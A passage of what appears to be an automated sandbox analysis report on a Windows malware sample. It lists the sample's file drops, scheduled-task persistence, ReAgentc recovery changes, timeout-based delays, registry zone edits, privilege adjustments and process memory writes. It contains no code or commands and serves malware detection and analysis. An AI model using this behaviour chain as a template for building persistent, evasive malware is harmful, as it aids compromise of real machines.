File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server.exe.log C:\Users\Admin\AppData\Roaming\server.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\text.dll C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe N/A
File opened for modification C:\Windows\SysWOW64\Recovery C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\$77svc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver C:\Windows\system32\wbem\wmiprvse.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Roaming\server.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2472 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 4420 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 4420 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 4420 wrote to memory of 388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 2472 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\cmd.exe
PID 2044 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2044 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2044 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4404 wrote to memory of 3892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4404 wrote to memory of 3892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4404 wrote to memory of 3892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2044 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2044 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
PID 2044 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\server.exe
